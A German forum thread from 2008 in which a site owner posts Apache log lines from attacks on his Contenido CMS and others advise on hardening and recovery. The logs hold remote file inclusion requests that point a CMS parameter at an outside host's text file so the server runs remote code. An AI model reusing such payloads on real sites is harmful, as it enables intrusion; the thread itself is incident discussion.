89.218.85.18 - - [08/Jun/2008:06:14:05 +0200] "GET /cms/klemm//contenido/includes/include.recipients.group.subnav.php?cfg[path][contenido]=http://nmbsquad-ng.110mb.com/adid.txt??? HTTP/1.1" 200 - "-" "libwww-perl/5.805"
62.140.19.142 - - [08/Jun/2008:06:17:55 +0200] "GET /cms/klemm/cms//contenido/includes/include.recipients.group.subnav.php?cfg[path][contenido]=http://nmbsquad-ng.110mb.com/adid.txt??? HTTP/1.1" 404 403 "-" "libwww-perl/5.76"
62.140.19.142 - - [08/Jun/2008:06:17:55 +0200] "GET //contenido/includes/include.recipients.group.subnav.php?cfg[path][contenido]=http://nmbsquad-ng.110mb.com/adid.txt??? HTTP/1.1" 404 388 "-" "libwww-perl/5.76"
62.140.19.142 - - [08/Jun/2008:06:17:55 +0200] "GET /cms/klemm//contenido/includes/include.recipients.group.subnav.php?cfg[path][contenido]=http://nmbsquad-ng.110mb.com/adid.txt??? HTTP/1.1" 200 - "-" "libwww-perl/5.76"
205.234.219.245 - - [08/Jun/2008:08:08:06 +0200] "GET /cms/klemm/cms//contenido/includes/include.recipients.group.subnav.php?cfg[path][contenido]=http://nmbsquad-ng.110mb.com/adid.txt??? HTTP/1.1" 404 403 "-" "libwww-perl/5.805"
205.234.219.245 - - [08/Jun/2008:08:08:08 +0200] "GET //contenido/includes/include.recipients.group.subnav.php?cfg[path][contenido]=http://nmbsquad-ng.110mb.com/adid.txt??? HTTP/1.1" 404 388 "-" "libwww-perl/5.805"
205.234.219.245 - - [08/Jun/2008:08:08:20 +0200] "GET /cms/klemm//contenido/includes/include.recipients.group.subnav.php?cfg[path][contenido]=http://nmbsquad-ng.110mb.com/adid.txt??? HTTP/1.1" 200 - "-" "libwww-perl/5.805"
89.218.85.18 - - [08/Jun/2008:15:33:38 +0200] "GET /cms/klemm/cms//contenido/includes/include.recipients.group.subnav.php?cfg[path][contenido]=http://nmbsquad-ng.110mb.com/adid.txt??? HTTP/1.1" 404 403 "-" "libwww-perl/5.805"
89.218.85.18 - - [08/Jun/2008:15:33:38 +0200] "GET //contenido/includes/include.recipients.group.subnav.php?cfg[path][contenido]=http://nmbsquad-ng.110mb.com/adid.txt??? HTTP/1.1" 404 388 "-" "libwww-perl/5.805"
89.218.85.18 - - [08/Jun/2008:15:33:38 +0200] "GET /cms/klemm//contenido/includes/include.recipients.group.subnav.php?cfg[path][contenido]=http://nmbsquad-ng.110mb.com/adid.txt??? HTTP/1.1" 200 - "-" "libwww-perl/5.805"
62.140.19.142 - - [08/Jun/2008:15:37:00 +0200] "GET /cms/klemm/cms//contenido/includes/include.recipients.group.subnav.php?cfg[path][contenido]=http://nmbsquad-ng.110mb.com/adid.txt??? HTTP/1.1" 404 403 "-" "libwww-perl/5.76"
62.140.19.142 - - [08/Jun/2008:15:37:00 +0200] "GET //contenido/includes/include.recipients.group.subnav.php?cfg[path][contenido]=http://nmbsquad-ng.110mb.com/adid.txt??? HTTP/1.1" 404 388 "-" "libwww-perl/5.76"
62.140.19.142 - - [08/Jun/2008:15:37:00 +0200] "GET /cms/klemm//contenido/includes/include.recipients.group.subnav.php?cfg[path][contenido]=http://nmbsquad-ng.110mb.com/adid.txt??? HTTP/1.1" 200 - "-" "libwww-perl/5.76"

boeckers · Beitrag von **boeckers** » Di 10. Jun 2008, 11:11

HI Martin,

das sieht nach der alten Deep-link Attacke aus.

Lade dir evtl. einmal das conubo-HTA.lite für Contenido auf meiner Site www.conubo.net herunter und starte das.
Der Download ist kostenlos.

Das legt .htaccess Dateien an und damit wird versucht solche deep-link Attacken zu verhindern.

Gerade zum Schutz älterer Installationen ist das oft ganz hilfreich.

Gruss

boeckers

Martin S. · Beitrag von **Martin S.** » Di 10. Jun 2008, 11:11

Dann habe ich noch einen Log-Eintrag mit dem permanenten Aufruf einer JS-Datei gesehen

cms/js/jsApi.js

Die gehört doch nicht zum Standard des Systems oder?!

Und müssen denn eigentlich die ganzen Verzeichnisse auf 777 stehen oder kann ich das auch einschränken? Wenn ich das gemacht habe und die Backups wieder drüber, werden ich anschließend die htaccess Dateien mal drüber bügeln. Dank euch, falls ihr noch Tipps habt, gerne.

tono · Beitrag von **tono** » Di 10. Jun 2008, 11:47

Du solltest dieses subforum genau studieren, da gibt es noch viele Hinweise und Tipps.

Ob die Verzeichnisse auf 777 stehen müssen oder nicht hängt stark vom System ab. Einfach ausprobieren in diesem Fall ist ja weniger mehr!

Beitrag von **Dodger77** » Di 10. Jun 2008, 12:04

Martin S. hat geschrieben:Dann habe ich noch einen Log-Eintrag mit dem permanenten Aufruf einer JS-Datei gesehen

cms/js/jsApi.js

Die gehört doch nicht zum Standard des Systems oder?!

Nein, die wird allerdings im Standard-Layout aufgerufen. Diesen Aufruf kann man einfach entfernen aus dem HTML. Das wird wohl nichts mit dem Hack zu tun haben.

Martin S. · Beitrag von **Martin S.** » Di 10. Jun 2008, 12:10

Achja stimmt, jetzt erinnere ich mich, dann wirds das js wohl nicht gewesen sein. Jedenfalls spielt mir der Provider die alten Backups wieder ein und anschließen werde ich die HTA-Geschichte drüber laufen lassen, hoffe dann ist das gröbste gestopft, dank euch.

Beitrag von **Dodger77** » Di 10. Jun 2008, 12:36

Martin S. hat geschrieben:..., hoffe dann ist das gröbste gestopft, ...

Wichtig ist, dass man mal die Backups und den derzeitigen Stand miteinander vergleich (z.B. mit Winmerge), um herauszufinden, woran es nun wirklich lag. Die Angriffsversuche in den Logfiles oben sollten in Contenido-Versionen ab 4.6.8 eigentlich nicht erfolgreich sein.

Martin S. · Beitrag von **Martin S.** » Di 10. Jun 2008, 12:48

Danke für den Hinweis, aber ich kann nichts vergleichen, weil die Dateien alle wieder eigenständig gelöscht wurden, ich habe nur leere Verzeichnisse als resultat.

cms/
cache
css
js
logs
templates
upload

contenido/
cronjobs
logs

sonst sehe ich nichts und die Logfiles sagen auch nicht so wirklich viel aus, oder zumindest kapiere ich die Einträge nicht wirklich.

Ach ja und die Versionen gingen wie schon oben beschrieben von der 4.6.8 bis zur 4.8.2.